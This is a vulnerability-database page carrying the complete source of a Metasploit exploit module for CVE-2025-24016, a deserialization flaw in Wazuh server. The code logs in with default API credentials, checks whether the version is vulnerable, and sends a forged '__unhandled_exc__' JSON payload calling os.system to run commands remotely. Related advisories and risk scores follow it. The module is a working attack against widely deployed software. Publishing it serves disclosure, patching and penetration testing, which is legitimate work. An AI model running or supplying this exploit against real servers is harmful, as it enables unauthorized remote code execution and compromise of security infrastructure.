Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Wazuh Server Remote Code Execution

🗓️ 12 Aug 2025 00:00:00Reported by h00die-gr3y, DanielFiType 
packetstorm
 packetstorm🔗 packetstorm.news👁 88 Views

Unsafe deserialization in Wazuh DistributedAPI enables remote code execution via dictionaries.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Deserialization of Untrusted Data in Wazuh
13 Feb 202506:38
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Wazuh
13 Jul 202523:56
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Wazuh
10 Jun 202518:54
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Wazuh
16 Feb 202511:01
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Wazuh
10 Jun 202521:07
githubexploit
ATTACKERKB		CVE-2025-24016
10 Feb 202500:00
attackerkb
Circl		CVE-2025-24016
10 Feb 202517:01
circl
CISA KEV Catalog		Wazuh Server Deserialization of Untrusted Data Vulnerability
10 Jun 202500:00
cisa_kev
CISA		 CISA Adds Two Known Exploited Vulnerabilities to Catalog
10 Jun 202512:00
cisa
CNNVD		Wazuh 代码问题漏洞
10 Feb 202500:00
cnnvd
Rows per page
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability.',
            'Description' => %q{
              Wazuh is a free and open source platform used for threat prevention, detection, and response.
              Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
              allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized
              as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
              If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
              forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
              The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
              servers in the cluster) or, in certain configurations, even by a compromised agent.
            },
            'Author' => [
              'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
              'DanielFi https://github.com/DanielFi', # Discovery
            ],
            'References' => [
              ['CVE', '2025-24016'],
              ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
              ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
            ],
            'License' => MSF_LICENSE,
            'Platform' => ['unix', 'linux'],
            'Privileged' => false,
            'Arch' => [ARCH_CMD],
            'Targets' => [
              [
                'Unix/Linux Command',
                {
                  'Platform' => ['unix', 'linux'],
                  'Arch' => ARCH_CMD,
                  'Type' => :unix_cmd
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DisclosureDate' => '2025-02-10',
            'DefaultOptions' => {
              'SSL' => true,
              'RPORT' => 55000
            },
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
              'Reliability' => [REPEATABLE_SESSION]
            }
          )
        )
        register_options([
          OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
          OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
          OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
        ])
      end
    
      # get Wazuh API token
      # return token if API login is successful else nil
      def get_api_token
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
          'headers' => {
            'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
          }
        })
        return unless res&.code == 200 && res.body.include?('token')
    
        res_json = res.get_json_document
        res_json['data']['token'] unless res_json.blank?
      end
    
      # get the Wazuh version
      # return version if successful else nil
      def get_wazuh_version(api_token)
        api_auth = "Bearer #{api_token}"
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path),
          'headers' => {
            'Authorization' => api_auth.to_s
          }
        })
        return unless res&.code == 200 && res.body.include?('api_version')
    
        res_json = res.get_json_document
        res_json['data']['api_version'] unless res_json.blank?
      end
    
      # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
      def execute_payload(cmd, _opts = {})
        # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
        post_data = {
          __unhandled_exc__: {
            __class__: 'os.system',
            __args__: [ cmd.to_s ]
          }
        }.to_json
    
        send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
          'ctype' => 'application/json',
          'headers' => {
            'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
          },
          'data' => post_data.to_s
        })
      end
    
      def check
        # check Wazuh API access with the API credentials
        api_token = get_api_token
        return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?
    
        version = get_wazuh_version(api_token)
        return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?
    
        version = Rex::Version.new(version)
        unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
          return CheckCode::Safe("Wazuh version #{version}")
        end
    
        CheckCode::Appears("Wazuh version #{version}")
      end
    
      def exploit
        print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
        execute_payload(payload.encoded)
      end
    end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Aug 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.9
EPSS0.93512
Wazuh serverunsafe deserializationremote code executiondistributed apijson deserializationwazuh objectapi accesscompromised dashboardcluster vulnerabilitypython code execution
88